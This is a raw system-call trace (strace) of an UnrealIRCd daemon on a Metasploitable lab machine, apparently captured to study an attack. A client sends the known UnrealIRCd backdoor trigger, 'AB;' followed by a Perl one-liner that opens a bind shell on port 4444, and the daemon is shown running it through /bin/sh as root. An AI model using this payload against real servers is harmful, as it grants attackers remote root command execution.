4519  07:43:43.311928 select(1024, [2 3 4 7 9], [], NULL, {0, 440000}) = 1 (in [2], left {0, 270000})

4519  07:43:43.481990 clock_gettime(CLOCK_MONOTONIC, {3033, 299011511}) = 0

4519  07:43:43.482012 accept(2, 0, NULL) = 5

4519  07:43:43.482045 getpeername(5, {sa_family=AF_INET, sin_port=htons(39343), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:43:43.482076 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:43.482089 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:43.482101 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:43:43.482113 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:43:43.482124 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:43:43.482135 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:43:43.482149 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:43:43.482164 clock_gettime(CLOCK_MONOTONIC, {3033, 299176602}) = 0

4519  07:43:43.482175 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:43:43.482186 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:43:43.482196 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:43:43.482205 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:43:43.482214 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:43:43.482231 send(6, "\240>\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:43:43.482328 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:43:43.482366 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:43:43.482541 gettimeofday({1495626223, 482546}, NULL) = 0

4519  07:43:43.482555 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:43:43.485351 clock_gettime(CLOCK_MONOTONIC, {3033, 302396473}) = 0

4519  07:43:43.485414 recvfrom(6, "\240>\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\372\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:43:43.485508 close(6)          = 0

4519  07:43:43.485523 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:43:43.485537 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:43:43.485588 time(NULL)        = 1495626223

4519  07:43:43.485601 time(NULL)        = 1495626223

4519  07:43:43.485629 gettimeofday({1495626223, 485633}, NULL) = 0

4519  07:43:43.485641 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:43:43.485671 clock_gettime(CLOCK_MONOTONIC, {3033, 302683582}) = 0

4519  07:43:43.485681 gettimeofday({1495626223, 485684}, NULL) = 0

4519  07:43:43.485691 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:43:43.485731 clock_gettime(CLOCK_MONOTONIC, {3033, 302744058}) = 0

4519  07:43:43.485743 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:43:43.485772 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:43:43.485792 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:43:43.485807 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:43:43.485827 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12703

12703 07:43:43.486035 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12703 07:43:43.486051 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12703 07:43:43.486062 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12703 07:43:43.486075 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12703 07:43:43.486192 brk(0)            = 0x80f9000

12703 07:43:43.486214 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.486231 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f8a000

12703 07:43:43.486247 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.486264 open("/etc/ld.so.cache", O_RDONLY) = 1

12703 07:43:43.486277 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12703 07:43:43.486296 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f82000

12703 07:43:43.486306 close(1)          = 0

12703 07:43:43.486317 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.486332 open("/lib/libncurses.so.5", O_RDONLY) = 1

12703 07:43:43.486345 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12703 07:43:43.486453 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12703 07:43:43.486492 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f52000

12703 07:43:43.486519 mmap2(0xb7f7f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f7f000

12703 07:43:43.486535 close(1)          = 0

12703 07:43:43.486547 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.486561 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12703 07:43:43.486576 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12703 07:43:43.486665 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12703 07:43:43.486683 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f4e000

12703 07:43:43.486694 mmap2(0xb7f50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f50000

12703 07:43:43.486709 close(1)          = 0

12703 07:43:43.486724 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.486738 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12703 07:43:43.486752 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12703 07:43:43.486841 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12703 07:43:43.486857 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4d000

12703 07:43:43.486871 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfe000

12703 07:43:43.486882 mmap2(0xb7f47000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f47000

12703 07:43:43.486896 mmap2(0xb7f4a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4a000

12703 07:43:43.486909 close(1)          = 0

12703 07:43:43.486932 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dfd000

12703 07:43:43.486953 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dfd6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12703 07:43:43.487009 mprotect(0xb7f47000, 4096, PROT_READ) = 0

12703 07:43:43.487045 munmap(0xb7f82000, 29913) = 0

12703 07:43:43.487071 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.487085 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12703 07:43:43.487105 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfadfca0) = -1 ENOTTY (Inappropriate ioctl for device)

12703 07:43:43.487135 brk(0)            = 0x80f9000

12703 07:43:43.487144 brk(0x80fa000)    = 0x80fa000

12703 07:43:43.487156 brk(0x80fb000)    = 0x80fb000

12703 07:43:43.487174 getuid32()        = 0

12703 07:43:43.487183 getgid32()        = 0

12703 07:43:43.487192 geteuid32()       = 0

12703 07:43:43.487201 getegid32()       = 0

12703 07:43:43.487215 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.487228 time(NULL)        = 1495626223

12703 07:43:43.487240 brk(0x80fc000)    = 0x80fc000

12703 07:43:43.487255 brk(0x80fd000)    = 0x80fd000

12703 07:43:43.487274 open("/proc/meminfo", O_RDONLY) = 1

12703 07:43:43.487295 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12703 07:43:43.487313 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f89000

12703 07:43:43.487324 read(1, "MemTotal:      1035240 kB\nMemFree:        305900 kB\nBuffers:         89768 kB\nCached:         478156 kB\nSwapCached:          0 kB\nActive:         258228 kB\nInactive:       438652 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        305660 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5128 kB\nWriteback:           0 kB\nAnonPages:      129016 kB\nMapped:          51968 kB\nSlab:            21272 kB\nSReclaimable:    12396 kB\nSUnreclaim:       8876 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12703 07:43:43.487411 close(1)          = 0

12703 07:43:43.487422 munmap(0xb7f89000, 4096) = 0

12703 07:43:43.487444 brk(0x80fe000)    = 0x80fe000

12703 07:43:43.487494 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12703 07:43:43.487522 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12703 07:43:43.487534 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12703 07:43:43.487547 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12703 07:43:43.487559 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12703 07:43:43.487571 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12703 07:43:43.487585 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12703 07:43:43.487596 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12703 07:43:43.487610 uname({sys="Linux", node="metasploitable", ...}) = 0

12703 07:43:43.487657 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12703 07:43:43.487676 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12703 07:43:43.487694 brk(0x8100000)    = 0x8100000

12703 07:43:43.487705 getcwd("/etc/unreal", 4096) = 12

12703 07:43:43.487719 getpid()          = 12703

12703 07:43:43.487736 getppid()         = 4519

12703 07:43:43.487752 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12703 07:43:43.487771 stat64("/sbin/sh", 0xbfadfc78) = -1 ENOENT (No such file or directory)

12703 07:43:43.487784 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12703 07:43:43.487801 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12703 07:43:43.487825 socket(PF_FILE, SOCK_STREAM, 0) = 1

12703 07:43:43.487838 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12703 07:43:43.487849 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12703 07:43:43.487871 close(1)          = 0

12703 07:43:43.487882 socket(PF_FILE, SOCK_STREAM, 0) = 1

12703 07:43:43.487892 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12703 07:43:43.487902 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12703 07:43:43.487920 close(1)          = 0

12703 07:43:43.487943 open("/etc/nsswitch.conf", O_RDONLY) = 1

12703 07:43:43.487995 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12703 07:43:43.488012 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f89000

12703 07:43:43.488024 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12703 07:43:43.488075 read(1, "", 4096) = 0

12703 07:43:43.488085 close(1)          = 0

12703 07:43:43.488108 munmap(0xb7f89000, 4096) = 0

12703 07:43:43.488124 open("/etc/ld.so.cache", O_RDONLY) = 1

12703 07:43:43.488136 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12703 07:43:43.488153 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f82000

12703 07:43:43.488163 close(1)          = 0

12703 07:43:43.488173 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.488188 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12703 07:43:43.488202 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12703 07:43:43.488295 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12703 07:43:43.488313 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df4000

12703 07:43:43.488324 mmap2(0xb7dfb000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dfb000

12703 07:43:43.488341 close(1)          = 0

12703 07:43:43.488353 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.488366 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12703 07:43:43.488380 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12703 07:43:43.488515 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

12703 07:43:43.488533 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ddc000

12703 07:43:43.488545 mmap2(0xb7df0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7df0000

12703 07:43:43.488560 mmap2(0xb7df2000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7df2000

12703 07:43:43.488574 close(1)          = 0

12703 07:43:43.488599 munmap(0xb7f82000, 29913) = 0

12703 07:43:43.488616 open("/etc/ld.so.cache", O_RDONLY) = 1

12703 07:43:43.488629 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12703 07:43:43.488646 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f82000

12703 07:43:43.488655 close(1)          = 0

12703 07:43:43.488666 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12703 07:43:43.488681 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

12703 07:43:43.488694 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

12703 07:43:43.488787 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

12703 07:43:43.488805 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd2000

12703 07:43:43.488816 mmap2(0xb7dda000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dda000

12703 07:43:43.488833 close(1)          = 0

12703 07:43:43.488845 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

